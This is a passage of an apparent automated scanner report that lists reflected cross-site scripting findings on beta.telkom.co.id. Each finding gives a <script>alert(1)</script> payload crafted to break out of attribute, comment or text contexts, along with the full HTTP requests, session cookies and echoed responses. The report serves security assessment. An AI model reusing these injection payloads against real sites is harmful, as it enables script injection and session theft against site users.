<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<b>/pojok-media9913e<script>alert(1)</script>9c313f8dfec/siaran-pers/index.html</b>
...[SNIP]...

4.46. http://beta.telkom.co.id/pojok-media/siaran-pers/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/siaran-pers/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a2ef"><script>alert(1)</script>5b76f035ef7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pojok-media/siaran-pers8a2ef"><script>alert(1)</script>5b76f035ef7/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.2.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:23:25 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23740
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/pojok-media/siaran-pers8a2ef"><script>alert(1)</script>5b76f035ef7/index.html?&lid=en">
...[SNIP]...

4.47. http://beta.telkom.co.id/pojok-media/siaran-pers/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/siaran-pers/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 53986--><script>alert(1)</script>5b54334d4b6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /pojok-media/siaran-pers53986--><script>alert(1)</script>5b54334d4b6/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.2.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:23:36 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23743
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/pojok-media/siaran-pers53986--><script>alert(1)</script>5b54334d4b6/index.html?&lid=en">
...[SNIP]...

4.48. http://beta.telkom.co.id/pojok-media/siaran-pers/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/siaran-pers/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4fb16<script>alert(1)</script>0b2f2e242ba was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pojok-media/siaran-pers4fb16<script>alert(1)</script>0b2f2e242ba/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.2.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:23:29 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23734
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<b>/pojok-media/siaran-pers4fb16<script>alert(1)</script>0b2f2e242ba/index.html</b>
...[SNIP]...

4.49. http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 98720<script>alert(1)</script>2a336272d34 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pojok-media98720<script>alert(1)</script>2a336272d34/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/siaran-pers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.4.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:25:12 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23932
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<b>/pojok-media98720<script>alert(1)</script>2a336272d34/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html</b>
...[SNIP]...

4.50. http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49e15"><script>alert(1)</script>5434cc3c433 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pojok-media49e15"><script>alert(1)</script>5434cc3c433/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/siaran-pers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.4.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:25:08 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23938
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/pojok-media49e15"><script>alert(1)</script>5434cc3c433/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html?&lid=en">
...[SNIP]...

4.51. http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload f0dd1--><script>alert(1)</script>b1410b8d68d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /pojok-mediaf0dd1--><script>alert(1)</script>b1410b8d68d/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/siaran-pers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.4.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:25:18 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23941
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/pojok-mediaf0dd1--><script>alert(1)</script>b1410b8d68d/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html?&lid=en">
...[SNIP]...

4.52. http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16605"><script>alert(1)</script>a086d335dd8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pojok-media/siaran-pers16605"><script>alert(1)</script>a086d335dd8/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/siaran-pers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.4.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:43 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23938
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/pojok-media/siaran-pers16605"><script>alert(1)</script>a086d335dd8/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html?&lid=en">
...[SNIP]...

4.53. http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 163d6--><script>alert(1)</script>5cd1b62ae23 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /pojok-media/siaran-pers163d6--><script>alert(1)</script>5cd1b62ae23/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/siaran-pers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.4.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:53 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23941
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/pojok-media/siaran-pers163d6--><script>alert(1)</script>5cd1b62ae23/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html?&lid=en">
...[SNIP]...

4.54. http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 83abb<script>alert(1)</script>62ed3c32c4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pojok-media/siaran-pers83abb<script>alert(1)</script>62ed3c32c4/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/siaran-pers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.4.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:48 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23929
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<b>/pojok-media/siaran-pers83abb<script>alert(1)</script>62ed3c32c4/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html</b>
...[SNIP]...

4.55. http://beta.telkom.co.id/products-services/index.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /products-services/index.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 437c2--><script>alert(1)</script>512b27f7612 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /products-services437c2--><script>alert(1)</script>512b27f7612/index.html?lid=en HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/produk-layanan/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.5.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:12 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23330
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<title>TELKOM
...[SNIP]...
<a href="/products-services437c2--><script>alert(1)</script>512b27f7612/index.html?&lid=id" class="blue">
...[SNIP]...

4.56. http://beta.telkom.co.id/products-services/index.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /products-services/index.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b1fda<script>alert(1)</script>2b730265f9d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-servicesb1fda<script>alert(1)</script>2b730265f9d/index.html?lid=en HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/produk-layanan/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.5.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:06 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23321
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<title>TELKOM
...[SNIP]...
<b>/products-servicesb1fda<script>alert(1)</script>2b730265f9d/index.html</b>
...[SNIP]...

4.57. http://beta.telkom.co.id/products-services/index.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /products-services/index.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae525"><script>alert(1)</script>66dba90169e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-servicesae525"><script>alert(1)</script>66dba90169e/index.html?lid=en HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/produk-layanan/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.5.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:02 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
